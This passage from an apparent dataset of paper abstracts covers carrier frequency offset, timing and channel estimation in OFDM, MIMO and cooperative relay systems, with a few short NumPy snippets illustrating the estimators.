interpolation estimation combined with a new decision feedback equalizer scheme based on the minimum mean squared error (MMSE) criterion is proposed to reduce the residual effect caused by an imperfect CIR equalizer, SFO and CFO. At the same time, for the purpose of speeding up the whole development and verification process, a new architecture of co-simulation platform which combines software and hardware is introduced. The simulation results on the co-simulation platform indicate that the proposed hybrid channel estimation scheme can enhance the receiver performance by 6 dB in terms of error vector magnitude (EVM) over large ranges of CFO and SFO, and the BER performance by 7 dB for SNR values above 15 dB. --- paper_title: Blind Timing and Carrier Synchronization in Decode and Forward Cooperative Systems paper_content: Synchronization in Decode and Forward (DF) cooperative communication systems is a complex and challenging task requiring estimation of many independent timing and carrier offsets at each relay in the broadcasting phase and multiple timing and carrier offsets at the destination in the relaying phase.
This paper presents a scheme for blind channel, timing and carrier offset estimation in a DF cooperative system with one source, M relays and one destination equipped with N antennas. In particular, we exploit blind source separation at the destination to convert the difficult problem of jointly estimating multiple synchronization parameters in the relaying phase into more tractable sub-problems of estimating many individual timing and carrier offsets for the independent relays. We also modify and propose a criterion for best relay selection at the destination. Simulation results demonstrate the excellent end-to-end Bit Error Rate (BER) performance of the proposed blind scheme with relay selection, which is shown to achieve the maximum diversity order with M = 4 relays using N = 5 antennas at the destination. The presented work is a complete solution to blind synchronization and channel estimation in DF cooperative communication systems. --- paper_title: CRB for Carrier Frequency Offset Estimation with Pilot and Virtual Subcarriers paper_content: The Cramer-Rao bound (CRB) for carrier frequency offset (CFO) estimation with OFDM blocks consisting of virtual, pilot and data subcarriers is derived in this paper. From the CRB derived in the general case in which all three kinds of subcarriers exist, the CRB for the special cases in which one or two kinds of subcarriers are absent can be easily deduced. Furthermore, the derived CRB is a tight lower bound, since well-designed estimators, e.g., the maximum likelihood (ML) estimator, can achieve it at high signal-to-noise ratio (SNR). Thus, the derived CRB is a good benchmark for evaluating many different CFO estimators. --- paper_title: Fine carrier and sampling frequency synchronization in OFDM systems paper_content: This paper investigates the joint pilot-assisted estimation of the residual carrier frequency offset (RCFO) and sampling frequency offset (SFO) in an orthogonal frequency division multiplexing (OFDM) system. As is known, the exact maximum-likelihood (ML) solution to this problem involves a bidimensional grid search that cannot be pursued in practice. After introducing an enlarged set of auxiliary unknown parameters, however, the RCFO and SFO recovery tasks can be decoupled and the bidimensional search is thus replaced with a simpler mono-dimensional search. This results in an estimation algorithm of reasonable complexity which is suitable for practical implementation. To further reduce the processing load, we also present an alternative scheme yielding frequency estimates in closed form. Numerical simulations indicate that the proposed methods outperform existing estimators available in the literature in terms of both estimation accuracy and error-rate performance. --- paper_title: Iterative Decision-Directed Joint Frequency Offset and Channel Estimation for KSP-OFDM paper_content: We propose an iterative decision-directed joint frequency offset (FO) and channel estimation algorithm for a known symbol padding (KSP) orthogonal frequency division multiplexing (OFDM) system, where the guard interval is filled with pilot symbols. Besides these time-domain pilot symbols, some additional pilot symbols are transmitted on the pilot carriers. The decision-directed algorithm is initialized by pilot-aided FO estimation without channel knowledge. We propose a possible initialization algorithm that operates in the frequency domain (FD). After the initialization phase, the iterative decision-directed estimation algorithm is applied.
For the channel estimation step, an existing pilot-aided channel estimation algorithm is extended to a decision-directed algorithm which uses the Fast Fourier Transform outputs at both the pilot and data carrier positions. For the uncoded case, the proposed iterative decision-directed joint FO and channel estimation algorithm reaches the bit error rate performance of a receiver with perfect synchronization and perfect channel knowledge. For a coded system, there is small loss in performance of less than 1 dB when our proposed algorithm is applied compared to a receiver with perfect knowledge about the FO and the channel. --- paper_title: Spectrum Sensing for OFDM Signals Using Pilot Induced Auto-Correlations paper_content: Orthogonal frequency division multiplex (OFDM) has been widely used in various wireless communications systems. Thus the detection of OFDM signals is of significant importance in cognitive radio and other spectrum sharing systems. A common feature of OFDM in many popular standards is that some pilot subcarriers repeat periodically after certain OFDM blocks. In this paper, sensing methods for OFDM signals are proposed by using such repetition structure of the pilots. Firstly, special properties for the auto-correlation (AC) of the received signals are identified, from which the optimal likelihood ratio test (LRT) is derived. However, this method requires the knowledge of channel information, carrier frequency offset (CFO) and noise power. To make the LRT method practical, we then propose an approximated LRT (ALRT) method that does not rely on the channel information and noise power, thus the CFO is the only remaining obstacle to the ALRT. To handle the problem, we propose a method to estimate the composite CFO and compensate its effect in the AC using multiple taps of ACs of the received signals. Computer simulations have shown that the proposed sensing methods are robust to frequency offset, noise power uncertainty, time delay uncertainty, and frequency selectiveness of the channel. --- paper_title: About the use of different processing domains for synchronization in non-contiguous FBMC systems paper_content: The problem of synchronization in non-contiguous OFDM (NC-OFDM) in the presence of other in-band systems is addressed by means of a comparison between time-and frequency-based signal processing approaches. The filterbank multicarrier scheme with its spectral-efficient offset-QAM (OQAM) OFDM implementation is thereby a good choice for an NC-OFDM system design due to its well-localized spectral signal shape. In this work, we present and discuss two NC-OFDM synchronization methods for OQAM-OFDM, employing the time domain and the already demodulated frequency domain signal for synchronization and evaluate them in terms of sustainable bit-error rate over signal-to-interference ratio and variance of time and frequency offset estimation in different resource allocation scenarios. Additionally, their computational complexity is taken into account to estimate the costs of implementation on hardware. The results show that the task of synchronization can be achieved with comparable performance in both domains with an advantage of frequency domain processing over time domain processing in terms of efficiency in preamble design and complexity. 
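The pilot-induced autocorrelation detector summarized above builds its test statistic from the correlation that periodically repeated pilots create in the received samples; the magnitude of that correlation is unaffected by a CFO, which only rotates its phase. The sketch below shows that basic magnitude-based statistic for a single known repetition lag. The multi-tap combining and composite-CFO compensation of the cited method, the detection threshold, and the signal sizes in the demo are all assumptions.

```python
import numpy as np

def ac_test_statistic(rx, lag):
    """Normalized lag-domain autocorrelation magnitude.

    If the transmitted signal repeats (pilots or CP) every `lag` samples, the
    statistic concentrates near the correlation coefficient of the repetition;
    for pure noise it stays near zero. A CFO only rotates the phase of the
    numerator, so taking the magnitude keeps the detector insensitive to it."""
    num = np.abs(np.sum(rx[:-lag] * np.conj(rx[lag:])))
    den = 0.5 * (np.sum(np.abs(rx[:-lag]) ** 2) + np.sum(np.abs(rx[lag:]) ** 2))
    return num / den

# Usage: period-80 repeated signal at 0 dB SNR vs. pure noise (illustrative sizes)
rng = np.random.default_rng(4)
lag, n_rep = 80, 50
block = (rng.standard_normal(lag) + 1j * rng.standard_normal(lag)) / np.sqrt(2)
eps = 0.01                                             # CFO in cycles/sample
n = np.arange(lag * n_rep)
sig = np.tile(block, n_rep) * np.exp(1j * 2 * np.pi * eps * n)
noise = (rng.standard_normal(n.size) + 1j * rng.standard_normal(n.size)) / np.sqrt(2)
print("signal present:", ac_test_statistic(sig + noise, lag))
print("noise only    :", ac_test_statistic(noise, lag))
```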
--- paper_title: Single Carrier Modulation With Nonlinear Frequency Domain Equalization: An Idea Whose Time Has Come—Again paper_content: In recent years single carrier modulation (SCM) has again become an interesting and complementary alternative to multicarrier modulations such as orthogonal frequency division multiplexing (OFDM). This has been largely due to the use of nonlinear equalizer structures implemented in part in the frequency domain by means of fast Fourier transforms, bringing the complexity close to that of OFDM. Here a nonlinear equalizer is formed with a linear filter to remove part of intersymbol interference, followed by a canceler of remaining interference by using previous detected data. Moreover, the capacity of SCM is similar to that of OFDM in highly dispersive channels only if a nonlinear equalizer is adopted at the receiver. Indeed, the study of efficient nonlinear frequency domain equalization techniques has further pushed the adoption of SCM in various standards. This tutorial paper aims at providing an overview of nonlinear equalization methods as a key ingredient in receivers of SCM for wideband transmission. We review both hybrid (with filters implemented both in time and frequency domain) and all-frequency-domain iterative structures. Application of nonlinear frequency domain equalizers to a multiple input multiple output scenario is also investigated, with a comparison of two architectures for interference reduction. We also present methods for channel estimation and alternatives for pilot insertion. The impact on SCM transmission of impairments such as phase noise, frequency offset and saturation due to high power amplifiers is also assessed. The comparison among the considered frequency domain equalization techniques is based both on complexity and performance, in terms of bit error rate or throughput. --- paper_title: Pilot Subset Partitioning Based Integer Frequency Offset Estimation for OFDM Systems With Cyclic Delay Diversity paper_content: Cyclic delay diversity (CDD) is a simple transmit diversity technique for coded OFDM systems with multiple transmit antennas. However, high frequency selectivity caused by CDD degrades the performance of post- FFT estimation, i.e., integer frequency offset (IFO). This paper suggests a simple way of improving the performance of the IFO estimator based on the pilot subset partitioning which is designed to reduce the effect of frequency selective fading by adopting the CDD. By partitioning uncorrelated pilot subcarriers into subsets to satisfy high correlation, and performing frequency estimation for each pilot subset, a robust IFO estimation scheme is derived. The simulation results show that the proposed method can provide benefit to the overall system performance . --- paper_title: A practical equalizer for cooperative delay diversity with multiple carrier frequency Offsets paper_content: Cooperative transmission in wireless networks provides diversity gain in multipath fading environments. Among all the proposed cooperative transmission schemes, delay diversity has the advantage of needing less coordination and higher spectrum efficiency. However, in a distributed network, the asynchrony comes from both carrier frequency and symbol timing between the cooperating relays. 
In this paper, a minimum mean square error fractionally spaced decision feedback equalizer (MMSE-FS-DFE) is developed to extract the diversity with large multiple carrier frequency offsets, its performance approaches the case without multiple carrier frequency offsets. The front end design for the receiver in this scenario is discussed, and a practical frame structure is designed for carrier frequency offsets and channel estimation. A subblock-wise decision-directed adaptive least squares (LS) estimation method is developed to solve the problem caused by error in frequency offset estimation. The purpose of this paper is to provide a practical design for cooperative transmission (CT) with the delay diversity scheme. --- paper_title: FADAC-OFDM: Frequency-Asynchronous Distributed Alamouti-Coded OFDM paper_content: We propose frequency-asynchronous distributed Alamouti-coded orthogonal frequency-division multiplexing (FADAC-OFDM). The proposed scheme effectively mitigates the intercarrier interference (ICI) due to frequency offset (FO) between two distributed antennas. The transmitter side of the proposed scheme transmits each of the two subslots in Alamouti code through two remote subcarriers symmetric to the center frequency and is referred to as space–frequency reversal schemes by Wang et al. or Choi. The receiver side of the proposed scheme is significantly different from the conventional scheme or the scheme proposed by Wang et al. in that it performs two discrete Fourier transform (DFT), each of which is synchronized to each transmit antenna's carrier frequency. The decision variables are generated by performing a simple linear combining with the same complexity as that of the conventional Alamouti code. The derivation shows that in flat-fading channels, the dominant ICI components due to FO cancel each other during the combining process. The proposed scheme achieves almost the same performance as the ideal Alamouti scheme, even with large FO. To use this ICI self-cancellation property for selective fading channels or in cases with timing offset (TO) between two transmit antennas, the total subcarriers are divided into several subblocks, and the proposed scheme is applied to each subblock. For mildly selective channels or cases with practically small TO, the proposed scheme achieves significantly improved performance compared with the conventional space–frequency Alamouti-coded OFDM. --- paper_title: Carrier frequency synchronization in the downlink of 3GPP LTE paper_content: In this paper, we investigate carrier frequency synchronization in the downlink of 3GPP Long Term Evolution (LTE). A complete carrier frequency offset estimation and compensation scheme based on standardized synchronization signals and reference symbols is presented. The estimation performance in terms of mean square error is derived analytically and compared to simulation results. The impact of estimation error on the system performance is shown in terms of uncoded bit error ratio and physical layer coded throughput. Compared to perfect synchronization, the presented maximum likelihood estimator shows hardly any performance loss, even when the most sophisticated MIMO schemes of LTE are employed. 
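Cyclic-prefix correlation is the usual first stage of the LTE downlink carrier synchronization chain summarized above: because the CP repeats the tail of each OFDM symbol, the phase of the CP correlation exposes the fractional CFO directly. The snippet below is a minimal version of that standard estimator for a single symbol with known timing; the LTE-specific reference-symbol ML refinement discussed in the paper is not included, and the numerology used in the demo is an assumed toy one rather than the LTE numerology.

```python
import numpy as np

def cp_cfo_estimate(sym, n_fft, n_cp):
    """Fractional CFO (in subcarrier spacings) from one CP-OFDM symbol with
    known timing: correlate the CP with the tail it was copied from."""
    cp = sym[:n_cp]
    tail = sym[n_fft:n_fft + n_cp]
    return np.angle(np.sum(np.conj(cp) * tail)) / (2.0 * np.pi)

# Usage with an assumed toy numerology (not the LTE one)
rng = np.random.default_rng(5)
n_fft, n_cp, eps_true = 256, 32, 0.12                  # eps in subcarrier spacings
X = np.exp(1j * 2 * np.pi * rng.integers(0, 4, n_fft) / 4)
x = np.fft.ifft(X)
sym = np.concatenate([x[-n_cp:], x])                   # prepend cyclic prefix
n = np.arange(sym.size)
sym = sym * np.exp(1j * 2 * np.pi * eps_true * n / n_fft)
sym += 0.01 * (rng.standard_normal(sym.size) + 1j * rng.standard_normal(sym.size))
print(cp_cfo_estimate(sym, n_fft, n_cp))               # close to 0.12
```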
--- paper_title: Maximum likelihood algorithms for joint estimation of synchronisation impairments and channel in multiple input multiple output–orthogonal frequency division multiplexing system paper_content: Maximum likelihood (ML) algorithms, for the joint estimation of synchronisation impairments and channel in multiple input multiple output–orthogonal frequency division multiplexing (MIMO–OFDM) system, are investigated in this work. A system model that takes into account the effects of carrier frequency offset, sampling frequency offset, symbol timing error and channel impulse response is formulated. Cramer–Rao lower bounds for the estimation of continuous parameters are derived, which show the coupling effect among different impairments and the significance of the joint estimation. The authors propose an ML algorithm for the estimation of synchronisation impairments and channel together, using the grid search method. To reduce the complexity of the joint grid search in the ML algorithm, a modified ML (MML) algorithm with multiple one-dimensional searches is also proposed. Further, a stage-wise ML (SML) algorithm using existing algorithms, which estimate less number of parameters, is also proposed. Performance of the estimation algorithms is studied through numerical simulations and it is found that the proposed ML and MML algorithms exhibit better performance than SML algorithm. --- paper_title: Joint AOD and CFO estimation in wireless sensor networks localization system paper_content: Self-localization system of wireless sensor networks based on angle of departure (AOD) is studied in this paper. In AOD model, anchor node with multi-antenna transmits orthogonal pilot signals to sensor node with single antenna, which entitles the sensor node to function as equipping multi-antenna. Given that the limited number of antenna at anchor nodes will result in degree of freedom (DOF) deficiency at sensor node when dealing with more multipath components (MPC), we adopt a novel method without requiring extra antennas. The proposed algorithm simultaneously includes the oscillator mismatch between anchor node and sensor node, i.e., carrier frequency offset (CFO). With the aid of anchor's movement and CFO, the equivalent antenna array at sensor node is expended by synthetic aperture procedure to a much larger one, which subsequently improve the estimation ability to MPCs. In addition, the close-form solutions of CFO and AOD are also derived. The effectiveness and performance of proposed algorithm are demonstrated by numerical simulations. --- paper_title: Classification of Space-Time Block Codes Based on Second-Order Cyclostationarity with Transmission Impairments paper_content: Signal classification is important in various commercial and military applications. Multiple antenna systems complicate the signal classification problem since there is now the issue of estimating the number and configuration of transmit antennas. The novel blind classification algorithm proposed in this paper exploits the cyclostationarity property of space-time block codes (STBCs) for the classification of multiple antenna systems in the presence of possible transmission impairments. Analytical expressions for the second-order cyclic statistics used as the basis of the algorithm are derived, and the computational cost of the proposed algorithm is considered. This algorithm avoids the need for a priori knowledge of the channel coefficients, modulation, carrier phase, and timing offsets. 
Moreover, it does not need accurate information about the transmission data rate and carrier frequency offset. Monte Carlo simulation results demonstrate a good classification performance with low sensitivity to phase noise and channel effects, including frequency-selective fading and Doppler shift. --- paper_title: A Novel Algebraic Carrier Frequency Offset Estimator for ASTC-MIMO-OFDM Systems Over a Correlated Frequency-Selective Channel paper_content: This paper presents a new algebraic carrier frequency offset (CFO) estimation technique for multiple-input-multiple-output (MIMO) orthogonal frequency-division multiplexing (OFDM) systems, to overcome the sensitivity of algebraic space-time codes (ASTCs) to frequency synchronization in quasi-static correlated Rayleigh frequency-selective fading channels. The technique uses a preamble and is thus particularly suitable for burst-mode communications. The preamble consists of orthogonal training sequences that are simultaneously transmitted from the various transmit antennas. The proposed system exploits all subcarriers in the frequency domain, which provides a remarkable performance improvement, and reaches the Cramer-Rao lower bound (CRLB) at high signal-to-noise ratio. The proposed method is compared with three known CFO estimators in the literature, namely the Cyclic-Prefix-based (CP), Moose, and Classen techniques, and shows clear advantages over them. --- paper_title: Blind carrier frequency offset estimator for multi-input multi-output-orthogonal frequency division multiplexing systems over frequency-selective fading channels paper_content: This study presents a new blind carrier frequency offset (CFO) estimation technique for multi-input multi-output (MIMO) orthogonal frequency division multiplexing (OFDM) systems employing space-time coding (STC). CFO estimation is crucial for OFDM systems to avoid the performance degradation caused by the inter-carrier interference that results when the CFO is not estimated and compensated accurately. Based on the assumptions that the data symbols are selected from a constant modulus constellation and that the channel is varying slowly over time, a new blind CFO estimator is proposed by minimising the power difference between all subcarriers in two consecutive STC blocks. Therefore, the proposed system exploits all subcarriers in both the time and frequency domains, which provides a remarkable performance improvement over other techniques reported in the literature. The complexity of the proposed estimator is substantially reduced by approximating the cost function by a sinusoid that can be minimised using direct closed-form computations within one OFDM symbol period. Monte Carlo simulations are used to assess the performance of the proposed system by means of the mean squared error (MSE) in both static and time-varying frequency-selective fading channels. The simulation results demonstrate that the proposed estimator can eliminate the MSE error floors that usually appear at moderate and high signal-to-noise ratios for estimators that work only in the frequency domain. --- paper_title: A Compact Preamble Design for Synchronization in Distributed MIMO OFDM Systems paper_content: In distributed multiple input multiple output (MIMO) orthogonal frequency division multiplexing (OFDM) systems, signals arrive at the receiver with different timings and are characterized by distinct carrier frequency offsets (CFOs), which makes synchronization considerably more challenging than in centralized MIMO systems.
Current solutions to this problem are mainly based on special preamble designs, where different training sequences are cascaded and then separately used to assist timing synchronization and CFO estimation. Such preamble designs not only increase system overhead but also burden the receivers with independent algorithms for timing synchronization and CFO estimation. In this paper, we propose a low-overhead (compact) preamble having the same length as one OFDM symbol, along with a unified algorithm for both timing synchronization and CFO estimation. Furthermore, the CFO estimation range can be flexibly extended to cope with larger CFOs in the proposed approach. Under the same training overhead and power consumption, simulation results indicate that the proposed approach outperforms a timing synchronization scheme that based on unequal period synchronization patterns. --- paper_title: Semi-blind MIMO OFDM systems with precoding aided CFO estimation and ICA based equalization paper_content: We propose a semi-blind multiple-input multiple-output (MIMO) orthogonal frequency division multiplexing (OFDM) system, with a precoding aided carrier frequency offset (CFO) estimation approach, and an independent component analysis (ICA) based equalization structure. A number of reference data sequences are carefully designed offline and are superimposed to source data via a non-redundant linear precoding process, which can kill two birds with one stone, without introducing any extra total transmit power and spectral overhead. First, the reference data sequences are selected from a pool of carefully designed orthogonal sequences. The CFO estimation is to minimize the sum cross-correlation between the CFO compensated signals and the rest orthogonal sequences in the pool. Second, the same reference data enable elimination of the permutation and quadrant ambiguity in the ICA equalized signals by maximizing the cross-correlation between the ICA equalized signals and the reference data. Simulation results show that, without extra bandwidth and power needed, the proposed semi-blind system achieves a bit error rate (BER) performance close to the ideal case with perfect channel state information (CSI) and no CFO. Also, the precoding aided CFO estimation outperforms the constant amplitude zero autocorrelation (CAZAC) sequences based CFO estimation approach, with no spectral overhead. --- paper_title: Linear Least Squares CFO Estimation and Kalman Filtering Based I/Q Imbalance Compensation in MIMO SC-FDE Systems paper_content: This paper investigates carrier frequency offset (CFO) estimation and inphase/quadrature (I/Q) imbalance compensation in time-varying frequency-selective channels. We first propose a linear least squares (LLS) CFO estimation approach which has a lower complexity and a higher accuracy than the previous nonlinear CFO estimation methods. We then propose a Kalman filtering based I/Q imbalance compensation approach in the presence of CFO, which demonstrates a good ability to track the channel time variations with a fast convergence speed, by nulling the cyclic prefix (CP) and including the CFO in the state vector of the equivalent channel model. The proposed Kalman filtering based I/Q imbalance compensation approach with associated equalization tracks the time variation with a fast convergence speed. 
Simulation results show that the proposed compensation approach for CFO and I/Q imbalance provides a bit error rate (BER) performance close to the ideal case with perfect channel state information (CSI), no CFO and no I/Q imbalance. --- paper_title: Reduced-complexity baseband compensation of joint Tx/Rx I/Q imbalance in mobile MIMO-OFDM paper_content: Direct-conversion multiple-input multiple-output orthogonal frequency division multiplexing (MIMO-OFDM) transceivers enjoy high data rates and reliability at practical implementation complexity. However, analog front-end impairments such as I/Q imbalance and high mobility requirements of next-generation broadband wireless standards result in performance-limiting inter-carrier interference (ICI). In this paper, we study the effects of ICI due to these impairments for OFDM with space frequency block codes and spatial multiplexing, derive a generalized linear model and propose a non-iterative reduced-complexity digital baseband joint compensation scheme. Furthermore, we present a pilot scheme for joint estimation of the channel and the I/Q imbalance parameters and evaluate its performance through simulations. Our proposed scheme is effective in estimating and compensating for frequency-independent and frequency-dependent transmit and receive I/Q imbalances even in the presence of a residual frequency offset. --- paper_title: Iterative Receiver Design With Joint Doubly Selective Channel and CFO Estimation for Coded MIMO-OFDM Transmissions paper_content: This paper is concerned with the problem of turbo (iterative) processing for joint channel and carrier frequency offset (CFO) estimation and soft decoding in coded multiple-input-multiple-output (MIMO) orthogonal frequency-division-multiplexing (OFDM) systems over time- and frequency-selective (doubly selective) channels. In doubly selective channel modeling, a basis expansion model (BEM) is deployed as a fitting parametric model to reduce the number of channel parameters to be estimated. Under pilot-aided Bayesian estimation, CFO and BEM coefficients are treated as random variables to be estimated by the maximum a posteriori technique. To attain better estimation performance without sacrificing spectral efficiency, soft bit information from a soft-input-soft-output (SISO) decoder is exploited in computing soft estimates of data symbols to function as pilots. These additional pilot signals, together with the original signals, can help to enhance the accuracy of channel and CFO estimates for the next iteration of SISO decoding. The resulting turbo estimation and decoding performance is enhanced in a progressive manner by benefiting from the iterative extrinsic information exchange in the receiver. Both extrinsic information transfer chart analysis and numerical results show that the iterative receiver performance is able to converge fast and close to the ideal performance using perfect CFO and channel estimates. --- paper_title: An Efficient Time Synchronization Scheme for Broadband Two-Way Relaying Networks Based on Physical-Layer Network Coding paper_content: We present an efficient time synchronization scheme for broadband two-way relaying networks based on two-phase physical layer network coding. Especially, a preamble structure is proposed in this letter for the synchronization. The synchronization approach exploits the preamble in frequency domain and time domain to effectively separate the mixed signals, and jointly estimate timing-offsets and channel parameters, respectively. 
Numerical results confirm that the suggested method is superior to the conventional scheme, and is very suitable for synchronization in broadband two-way relaying networks based on two-phase physical layer network coding. --- paper_title: One-Shot Blind CFO and Channel Estimation for OFDM With Multi-Antenna Receiver paper_content: In this paper, we design a new blind joint carrier frequency offset (CFO) and channel estimation method for orthogonal frequency-division multiplexing (OFDM) with a multi-antenna receiver. The proposed algorithm requires only one received OFDM block and thus belongs to the category of one-shot estimation methods. Other advantages of the proposed algorithm include: 1) it supports fully loaded data carriers and is thus spectrally efficient; 2) the channel from the transmitter to each receive antenna can be blindly estimated with only a scaling ambiguity; and 3) the algorithm outperforms existing methods. Moreover, we derive the Cramer-Rao bounds (CRB) of joint CFO and channel estimation in closed form. Numerical results not only show the effectiveness of the proposed algorithm but also demonstrate that its performance is close to the CRB. --- paper_title: Fast Kalman Equalization for Time-Frequency Asynchronous Cooperative Relay Networks With Distributed Space-Time Codes paper_content: Cooperative relay networks are inherently time and frequency asynchronous due to their distributed nature. In this correspondence, we propose a transceiver scheme to combat both time and frequency offsets for cooperative relay networks with multiple relay nodes. At the relay nodes, a distributed linear convolutive space-time coding is adopted, which has the following advantages: 1) Full cooperative diversity can be achieved using a minimum mean square error (MMSE) or MMSE decision feedback equalizer (MMSE-DFE) detector, instead of a maximum-likelihood receiver, when only time asynchronism exists. 2) The resultant equivalent channel possesses a special structure, which can be exploited to reduce the equalization complexity at the destination node. By taking full advantage of this special structure, fast Kalman equalizations based on linear MMSE and MMSE-DFE are proposed for the receiver, where the estimation of the state vector (information symbols) can be performed recursively and becomes very computationally efficient compared with direct equalization. The proposed scheme can achieve considerable diversity gain with both time and frequency offsets and applies to frequency-selective fading channels. --- paper_title: Improved CIR-Based Receiver Design for DVB-T2 System in Large Delay Spread Channels: Synchronization and Equalization paper_content: This paper proposes to implement an improved orthogonal frequency division multiplexing (OFDM) receiver by utilizing channel impulse response (CIR)-based synchronization and sparse equalization for a DVB-T2 system operating in both the single-input single-output (SISO) and multi-input single-output (MISO) transmission modes. First, the proposed OFDM receiver performs a pilot-aided CIR estimation after a coarse symbol timing recovery (STR). Then, the proposed CIR-based fine STR compensates for a false symbol timing offset (STO). In particular, the fine STR resolves an ambiguity effect of the CIR, which is the main problem caused by a false coarse STO when exploiting the CIR.
Upon the completion of the fine synchronization, the proposed CIR-based sparse equalization is performed in order to minimize the noise and interference effects by shifting or selecting a basic frequency interpolation (FI) filter according to an echo delay (phase) or maximum delay spread, respectively. Performance evaluations are accomplished in large delay spread channels in which the maximum delay spread is less or longer than a guard interval (GI). It is shown that the proposed receiver is not only capable of estimating the fine STO but also minimizing effectively the noise effects. In particular, the performance gain in a single pre-echo channel being longer than GI is remarkable as compared with a conventional receiver. --- paper_title: Joint maximum-likelihood estimation of frequency offset and channel coefficients in multiple-input multiple-output orthogonal frequency-division multiplexing systems with timing ambiguity paper_content: In this study, the authors consider a multiple-input multiple-output (MIMO) orthogonal frequency-division multiplexing system operating over unknown frequency-selective fading channels. Based on two different signal models, two maximum-likelihood schemes for joint carrier frequency offset (CFO) and MIMO channel estimation under timing ambiguity have been derived. The first estimator jointly estimates the timing offset, CFO and channel coefficients, but the complexity is high owing to the need of two-dimensional searches. The second estimator has a reduced complexity, but its performance slightly degrades compared with the first one. The performance of proposed estimators was benchmarked with Cramer–Rao bounds (CRB), and investigated by computer simulations. The simulation results show that the proposed estimators achieve almost ideal performances compared with the CRB. --- paper_title: Semiblind Iterative Receiver for Coded MIMO-OFDM Systems paper_content: In this paper, a semiblind iterative receiver is proposed for coded multiple-input-multiple-output orthogonal frequency-division multiplexing (MIMO-OFDM) systems. A novel iterative extended soft-recursive least square (IES-RLS) estimator for joint channel and frequency offset estimation is introduced. Extrinsic bit information obtained from the channel decoder and expected symbol decisions obtained from the demodulator are simultaneously exploited by the IES-RLS. The proposed receiver combines the MIMO data demodulator, the proposed channel estimator, and the channel decoder in an iterative manner to yield an improved bit error rate (BER) performance. To arrive at a feasible algorithm, the first-order linearization of the received vector signal with respect to the frequency offset is used in the IES-RLS channel estimator. The BER performance, a constellation-constrained mutual information analysis, and an EXIT chart analysis are used to verify the effectiveness of the proposed receiver. Simulation results show the superiority of the proposed semiblind receiver, compared with conventional semiblind receivers. --- paper_title: Fractional timing offset and channel estimation for MIMO OFDM systems over flat fading channels paper_content: This paper addresses the problem of fractional timing offset and channel estimation in Multiple input Multiple output orthogonal frequency division multiplexing (MIMO OFDM) systems. The estimators have been derived assuming a flat fading channel and using the maximum likelihood criterion. 
Closed form Cramer Rao bound (CRB) expressions for fractional timing offset and channel response are also derived. Simulation results have been used to cross-check the accuracy of the proposed estimation algorithm. --- paper_title: Parameter Estimation and Tracking in Physical Layer Network Coding paper_content: In this paper, we present an algorithm for joint decoding of the modulo-2 sum of the bits transmitted from two unsynchronized transmitters using Physical Layer Network Coding (PLNC). We address the problems that arise when the boundaries of the signals do not align with each other and when the channel parameters are slowly varying and are not known to the receiver at the relay node. Our approach first estimates jointly the timing and fading gains of both the signals, and uses a state-based Viterbi decoding scheme that takes into account the timing offsets between the interfering signals. We also track the amplitude and phase of the channel which may be slowly varying. Simulation results demonstrate the sensitivity of the detection performance at the relay node to the relative offset of the timings of the two user's signals as well as the advantage of our algorithm over previously published algorithms. --- paper_title: Blind timing and carrier synchronisation in distributed multiple input multiple output communication systems paper_content: This study addresses the problem of joint blind timing and carrier synchronisation in a (distributed-M ) × N antenna system where the objective is to estimate the M carrier offsets, the M timing offsets and to recover the transmitted symbols for each of the M users given only the measured signal at the N antennas of the receiver. The authors propose a modular receiver structure that exploits blind source separation to reduce the problem into more tractable sub-problems of estimating individual timing and carrier offsets for multiple users. This leads to a robust solution of low complexity. The authors investigate the performance of the estimators analytically using modified Cramer- Rao bounds and computer simulations. The results show that the proposed receiver exhibits robust performance over a wide range of parameter values, even with worst-case Doppler of 200- 300 Hz and frame size as small as 400 symbols. This work is relevant to future wireless networks and is a complete solution to the problem of estimating multiple timing and carrier offsets in distributed multiple input multiple output (MIMO) communication systems. --- paper_title: Preamble Based Joint CFO, Frequency-Selective I/Q-Imbalance and Channel Estimation and Compensation in MIMO OFDM Systems paper_content: A very promising technical approach for future wireless communication systems is to combine MIMO OFDM and Direct (up/down) Conversion Architecture (DCA). However, while OFDM is sensitive to Carrier Frequency Offset (CFO), DCA is sensitive to I/Q-imbalance. Such RF impairments can seriously degrade the system performance. For the compensation of these impairments, a preamble-based scheme is proposed in this paper for the joint estimation of CFO, transmitter (Tx) and receiver (Rx) frequency-selective I/Q-imbalance and the MIMO channel. This preamble is constructed both in time- and frequency domain and requires much less overhead than the existing designs. Moreover, Closed-Form Estimators (CLFE) are allowed, enabling efficient implementation. The advantages and effectiveness of the proposed scheme have been verified by numerical simulations. 
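Editor's note: the semiblind IES-RLS receiver summarized in one of the entries above, like several of the joint CFO-and-channel estimators collected here, relies on a first-order linearization of the received block with respect to the residual frequency offset; this is the step that turns the nonlinear CFO term into something a Kalman/RLS-style recursion can handle. The NumPy sketch below illustrates only that approximation on a toy single-antenna OFDM block; the FFT size, channel, and symbol names are assumptions made for this illustration and are not taken from any of the cited papers.

```python
import numpy as np

# Illustrative first-order (Taylor) linearization of a received OFDM block with
# respect to a small residual CFO 'eps' (normalized to the subcarrier spacing).
# All sizes and names are assumptions for this sketch, not a cited algorithm.
rng = np.random.default_rng(0)
N = 64                                                       # FFT size (assumed)
n = np.arange(N)
H = rng.standard_normal(N) + 1j * rng.standard_normal(N)     # per-subcarrier channel
s = np.exp(1j * np.pi / 2 * rng.integers(0, 4, N))           # QPSK symbols

def received(eps):
    """Time-domain block: channel applied per subcarrier, then a CFO phase ramp."""
    x = np.fft.ifft(H * s) * np.sqrt(N)
    return np.exp(1j * 2 * np.pi * eps * n / N) * x

eps = 0.02                                                   # small residual CFO
y_exact = received(eps)

# First-order expansion around eps = 0:  y(eps) ~ y(0) + eps * (j*2*pi*n/N) * y(0)
y0 = received(0.0)
y_lin = y0 + eps * (1j * 2 * np.pi * n / N) * y0

err = np.linalg.norm(y_exact - y_lin) / np.linalg.norm(y_exact)
print(f"relative linearization error at eps={eps}: {err:.2e}")
```

In the iterative receivers surveyed here, this expansion is not applied once around zero but is refreshed around the current offset estimate at each iteration, which keeps the approximation error small even for moderate offsets.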
